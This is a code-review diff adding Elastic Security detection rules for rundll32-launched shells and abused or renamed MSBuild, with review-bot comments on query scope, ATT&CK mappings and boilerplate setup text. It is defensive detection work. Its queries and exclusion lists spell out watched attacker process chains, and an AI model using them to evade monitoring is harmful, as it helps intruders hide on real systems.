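Review bot: The `index` pattern `logs-endpoint.events.*` is broader than the query needs: the sequence consumes only `library` and `network` events, and other rules in this same commit are being narrowed (e.g. `9ccf3ce0-0057-440a-91f5-870c6ad39093_110` moves from `logs-endpoint.events.*` to `logs-endpoint.events.process-*`), so `"logs-endpoint.events.library-*"` and `"logs-endpoint.events.network-*"` would be consistent with that change and cheaper to evaluate. The rule is also version 1 with no `false_positives` or `note` entry, although the query already hard-codes a sizable `process.executable` exclusion list (dsac.exe, the pwsh/WindowsPowerShell hosts, the monitoring agent, the ADWS service binary); a `false_positives` entry naming the administrative tooling those paths stand for would make the exclusions reviewable, and it is worth stating explicitly that AD-module use from the PowerShell hosts is out of scope for this rule. The `not user.id in (...)` guard is applied only to the `library` event, which is fine because the join is `by process.entity_id`; an inline `/* user filter applies to the whole sequence via process.entity_id */` in the query would save the next reader that check.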
@@ -0,0 +1,150 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code.", + "false_positives": [ + "Microsoft Windows installers leveraging RunDLL32 for installation." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Shell Activity Started via RunDLL32", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"cmd.exe\", \"powershell.exe\") and\n process.parent.name : \"rundll32.exe\" and process.parent.command_line != null and\n /* common FPs can be added here */\n not process.parent.args : (\"C:\\\\Windows\\\\System32\\\\SHELL32.dll,RunAsNewUser_RunDLL\",\n \"C:\\\\WINDOWS\\\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to 
populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9ccf3ce0-0057-440a-91f5-870c6ad39093_109", + "type": "security-rule" +} \ No 
newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_110.json b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_110.json new file mode 100644 index 00000000000..b55feca2506 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9ccf3ce0-0057-440a-91f5-870c6ad39093_110.json 
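Review bot: `process.name : ("cmd.exe", "powershell.exe")` omits `pwsh.exe`, while the MSBuild rule added in this same commit (`9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208`) enumerates `"cmd.exe" or "powershell.exe" or "pwsh.exe" or "powershell_ise.exe"`; a PowerShell 7 shell started by rundll32.exe would not match here, so consider `process.name : ("cmd.exe", "powershell.exe", "pwsh.exe")` unless the omission is deliberate. The threat mapping to TA0006 / T1552 (Unsecured Credentials) is not reflected by anything in the query, which only tests the parent/child process pair; either the mapping is inherited and should be dropped together with the `"Tactic: Credential Access"` tag, or the `description` should say which credential-related behaviour the rule is meant to surface. The `_110` hunk that follows carries the identical query and mapping (only the index is narrowed to `logs-endpoint.events.process-*`), so both files need the same edit.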
@@ -0,0 +1,150 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies command shell activity started via RunDLL32, which is commonly abused by attackers to host malicious code.", + "false_positives": [ + "Microsoft Windows installers leveraging RunDLL32 for installation." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Command Shell Activity Started via RunDLL32", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"cmd.exe\", \"powershell.exe\") and\n process.parent.name : \"rundll32.exe\" and process.parent.command_line != null and\n /* common FPs can be added here */\n not process.parent.args : (\"C:\\\\Windows\\\\System32\\\\SHELL32.dll,RunAsNewUser_RunDLL\",\n \"C:\\\\WINDOWS\\\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline 
to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9ccf3ce0-0057-440a-91f5-870c6ad39093_110", + "type": "security-rule" +} \ 
No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208.json new file mode 100644 index 00000000000..e35c91e4b38 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208.json 
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a Script Process", + "new_terms_fields": [ + "host.id", + "user.name", + "process.command_line" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and (\n process.name.caseless:\"msbuild.exe\" or process.pe.original_file_name:\"MSBuild.exe\") and \n process.parent.name:(\"cmd.exe\" or \"powershell.exe\" or \"pwsh.exe\" or \"powershell_ise.exe\" or \"cscript.exe\" or\n \"wscript.exe\" or \"mshta.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 
8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208", + "type": "security-rule" +} \ No newline at end of file 
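Review bot: The `setup` text ("If enabling an EQL rule on a non-elastic-agent index ... default fallback for EQL rules was not added until version 8.2") does not match this rule, which is `"language": "kuery"` with `"type": "new_terms"`; it reads as boilerplate copied from the EQL rules in this diff and will mislead anyone deciding whether they need the custom `event.ingested` pipeline. Either reword it to describe the `timestamp_override: event.ingested` requirement as it applies to a new-terms rule, or drop the EQL-specific sentences. Separately, `new_terms_fields` includes `process.command_line`, which is absent from `required_fields`; if that list is meant to be exhaustive it should gain `{"ecs": true, "name": "process.command_line", "type": "wildcard"}`, matching how `process.parent.command_line` is typed elsewhere in this diff. The `_209` hunk that follows carries the identical `setup` text and field lists and needs the same fix.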
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209.json new file mode 100644 index 00000000000..0cc0ce3519a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209.json 
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a Script Process", + "new_terms_fields": [ + "host.id", + "user.name", + "process.command_line" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and (\n process.name.caseless:\"msbuild.exe\" or process.pe.original_file_name:\"MSBuild.exe\") and \n process.parent.name:(\"cmd.exe\" or \"powershell.exe\" or \"pwsh.exe\" or \"powershell_ise.exe\" or \"cscript.exe\" or\n \"wscript.exe\" or \"mshta.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until 
version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109.json new file mode 100644 index 00000000000..dc228d27682 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Explorer or the WMI (Windows Management Instrumentation) subsystem. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a System Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"explorer.exe\", \"wmiprvse.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110.json new file mode 100644 index 00000000000..f303c1c5469 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110.json 
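Review bot: The second `threat` entry asserts tactic TA0002 (Execution) with an empty `"technique": []`, which is a mapping with no content; the companion rule `9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208` resolves the same tactic to T1059 with sub-techniques, so here the entry should either carry the technique the parent list actually represents (if `wmiprvse.exe` as the parent is the reason for the tactic, T1047 is the conventional mapping, to be confirmed) or be removed so the tactic is not claimed without a technique. `tags` still lists `"Tactic: Execution"`, so whichever way this goes the tag and the `threat` block should be kept in agreement. The `_110` hunk that follows has the same empty technique array.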
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Explorer or the WMI (Windows Management Instrumentation) subsystem. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a System Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"explorer.exe\", \"wmiprvse.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: 
Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111.json new file mode 100644 index 00000000000..7d649c1e25e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Using an Alternate Name", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to 